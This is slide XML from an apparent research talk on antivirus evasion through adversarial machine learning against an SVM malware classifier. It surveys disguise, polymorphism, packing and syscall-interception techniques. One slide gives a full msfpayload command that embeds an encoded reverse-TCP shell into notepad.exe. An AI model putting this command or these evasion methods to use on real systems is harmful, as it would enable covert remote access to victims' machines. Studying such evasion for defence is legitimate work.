            <a:off x="8494062" y="4536510"/>
            <a:ext cx="1835465" cy="1835465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2758333" y="4536510"/>
            <a:ext cx="1835466" cy="1835466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5931738" y="4331367"/>
            <a:ext cx="1644822" cy="2040607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3576357" y="4896998"/>
            <a:ext cx="1802901" cy="1707002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6417526" y="4896998"/>
            <a:ext cx="1802901" cy="1707002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9198575" y="4896998"/>
            <a:ext cx="1802901" cy="1707002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="547090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Disguise as Popular File Formats or Programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165177" y="1904998"/>
            <a:ext cx="5059159" cy="4797479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6481011" y="2723146"/>
            <a:ext cx="5358063" cy="2492990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> windows/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> LHOST=192.168.1.75 LPORT=4444 R | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> -c 5 -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> -x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>notepad.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>notepad2.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9021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2264490"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>How should a virus disguise itself to fool the antivirus? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Adversarial Machine Learning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="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Virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1347776"/>
            <a:ext cx="8915400" cy="2952755"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>mutates on each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>copy by adding NOPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg1. Adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>0 to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>ORing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> a register with itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg3. shifting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>it left 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg4. jumping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>to the next instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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27" y="4027284"/>
            <a:ext cx="7344926" cy="2673553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1781237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E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xisting Hiding Schemes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1610644" y="2117558"/>
            <a:ext cx="8915400" cy="4604084"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Obfuscation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Executable compression, old yet effective. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Ultimate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Packer for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>executables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>upx.github.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>interception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>antivirus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> scans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>boot sector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, virus in memory just returns the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true boot sector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>rather than its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>hiding place in the bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>block.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Ineffective against privileged antivirus</a:t>
            </a:r>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179" y="2776622"/>
            <a:ext cx="3435433" cy="1616674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1388441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2589212" y="2133600"/>
            <a:ext cx="8915400" cy="4171950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>Antivirus evasion techniques show ease in avoiding antivirus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Joe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Granneman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>searchsecurity.techtarget.com/feature/Antivirus-evasion-techniques-show-ease-in-avoiding-antivirus-detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>Attacks from Outside the Operating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, Andrew Tanenbaum, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.informit.com/articles/article.aspx?p=26150&amp;seqNum=5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1192103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4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277979" y="1612232"/>
            <a:ext cx="9442605" cy="472440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By modifying Top N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>according</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>can fool the given SVM model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Removing attributes works better than adding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>In practice removing attributes is not as realistic </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>adding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Our hiding scheme serves as the combination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>two existing schemes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>On the anti-virus software side: How to be robust against modified malicious samples? (Game theory)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1538026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427847" y="1264555"/>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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>72 benign samples, 301 virus samples</a:t>
            </a:r>
          </a:p>
          <a:p>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1954973"/>
            <a:ext cx="9764153" cy="1411193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1740743" y="4520328"/>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
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8289634" y="2429736"/>
            <a:ext cx="935666" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>530</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5774376" y="3483391"/>
            <a:ext cx="1178873" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>30</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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100661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smtClean="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smtClean="0"/>
              <a:t>Model training (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>LibSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>) and testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Modify the data in the test set and redo testing using original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>libSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>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 </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a:t>Model training (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>LibSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) and testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify the data in the test set and redo testing using original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libSVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
